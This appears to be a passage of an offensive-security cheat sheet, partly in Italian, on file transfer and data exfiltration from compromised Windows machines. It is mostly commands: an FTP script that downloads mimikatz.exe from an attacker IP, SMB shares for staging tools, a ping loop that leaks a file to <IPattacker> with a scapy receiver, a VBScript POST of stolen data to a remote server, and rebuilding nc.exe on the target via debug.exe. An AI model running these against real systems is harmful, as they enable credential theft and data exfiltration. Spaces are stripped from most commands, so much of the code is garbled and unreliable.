#Run the following script to configure the FTP server#!/bin/bashgroupaddftpgroupuseradd-gftpgroup-d/dev/null-s/etcftpuserpure-pwduseraddfusr-uftpuser-d/ftphomepure-pwmkdbcd/etc/pure-ftpd/auth/ln-s../conf/PureDB60pdbmkdir-p/ftphomechown-Rftpuser:ftpgroup/ftphome//etc/init.d/pure-ftpdrestart
Client Windows
#Work well with python. With pure-ftp use fusr:ftpechoopen10.11.0.4121>ftp.txtechoUSERanonymous>>ftp.txtechoanonymous>>ftp.txtechobin>>ftp.txtechoGETmimikatz.exe>>ftp.txtechobye>>ftp.txtftp-n-v-s:ftp.txt
SMB
Kali come server
kali_op1>impacket-smbserver-smb2supportkali`pwd`# Share current directorykali_op2>smbserver.py-smb2supportname/path/folder# Share a folder#For new Win10 versionsimpacket-smbserver-smb2support-usertest-passwordtesttest`pwd`
O creare una condivisione smb utilizzando samba:
apt-getinstallsambamkdir/tmp/smbchmod777/tmp/smb#Add to the end of /etc/samba/smb.conf this:[public]comment=SambaonUbuntupath=/tmp/smbreadonly=nobrowsable=yesguestok=Yes#Start sambaservicesmbdrestart
Esfiltrazione su Windows
Esistono diverse tecniche per esfiltrare dati da un sistema Windows compromesso. Alcuni metodi comuni includono:
Utilizzo di protocolli di rete: trasferire dati attraverso protocolli di rete come HTTP, HTTPS, DNS o FTP.
Utilizzo di servizi cloud: caricare i dati su servizi cloud come Dropbox, Google Drive o OneDrive.
Utilizzo di tunneling: creare tunnel crittografati per inviare dati a un server remoto.
Utilizzo di steganografia: nascondere i dati all'interno di file multimediali o altri file per esfiltrarli in modo discreto.
Utilizzo di dispositivi di archiviazione rimovibili: copiare i dati su dispositivi USB o altri dispositivi di archiviazione rimovibili.
È importante considerare il rischio di rilevamento durante il processo di esfiltrazione e scegliere il metodo più appropriato in base all'ambiente e agli obiettivi dell'attaccante.
CMD-Wind> \\10.10.14.14\path\to\exeCMD-Wind>netusez: \\10.10.14.14\test/user:testtest#For SMB using credentialsWindPS-1>New-PSDrive-Name"new_disk"-PSProvider"FileSystem"-Root"\\10.10.14.9\kali"WindPS-2>cdnew_disk:
Netcat è uno strumento versatile per l'interazione di rete che consente la lettura e la scrittura di dati su connessioni di rete utilizzando il protocollo TCP o UDP. Può essere utilizzato per trasferire file, creare backdoor, eseguire shell remote e molto altro.
# To exfiltrate the content of a file via pings you can do:xxd-p-c4/path/file/exfil|whilereadline; doping-c1-p $line <IPattacker>; done#This will 4bytes per ping packet (you could probably increase this until 16)
from scapy.all import*#This is ippsec receiver created in the HTB machine Mischiefdefprocess_packet(pkt):if pkt.haslayer(ICMP):if pkt[ICMP].type ==0:data = pkt[ICMP].load[-4:]#Read the 4bytes interestingprint(f"{data.decode('utf-8')}", flush=True, end="")sniff(iface="tun0", prn=process_packet)
SMTP
Se puoi inviare dati a un server SMTP, puoi creare un server SMTP per ricevere i dati con python:
sudopython-msmtpd-n-cDebuggingServer:25
TFTP
Per impostazione predefinita in XP e 2003 (in altri sistemi operativi deve essere aggiunto esplicitamente durante l'installazione)
In Kali, avvia il server TFTP:
#I didn't get this options working and I prefer the python optionmkdir/tftpatftpd--daemon--port69/tftpcp/path/tp/nc.exe/tftp
VBScript (Visual Basic Scripting Edition) è un linguaggio di scripting sviluppato da Microsoft che è spesso utilizzato per automatizzare attività all'interno di sistemi Windows. È possibile utilizzare VBScript per eseguire operazioni di esfiltrazione di dati, come ad esempio inviare informazioni sensibili a un server remoto. Ecco un esempio di codice VBScript che illustra come eseguire l'esfiltrazione di dati:
Dim objXMLHTTP
Set objXMLHTTP = CreateObject("MSXML2.ServerXMLHTTP")
objXMLHTTP.open "POST", "http://www.example.com/data_receiver", False
objXMLHTTP.setRequestHeader "Content-type", "application/x-www-form-urlencoded"
objXMLHTTP.send "data=exfiltrated_data"
Set objXMLHTTP = Nothing
In questo esempio, il codice VBScript crea un oggetto MSXML2.ServerXMLHTTP per inviare i dati esfiltrati a un server remoto tramite una richiesta POST. È importante notare che l'utilizzo di VBScript per scopi di esfiltrazione di dati può essere considerato un comportamento dannoso e potenzialmente illegale senza il consenso esplicito del proprietario del sistema.
Il programma debug.exe non solo consente l'ispezione dei file binari ma ha anche la capacità di ricostruirli da esadecimale. Ciò significa che fornendo un esadecimale di un file binario, debug.exe può generare il file binario. Tuttavia, è importante notare che debug.exe ha una limitazione nell'assemblare file fino a 64 kb in dimensione.
# Reduce the sizeupx-9nc.exewineexe2bat.exenc.exenc.txt
Quindi copia-incolla il testo nella shell di Windows e verrà creato un file chiamato nc.exe.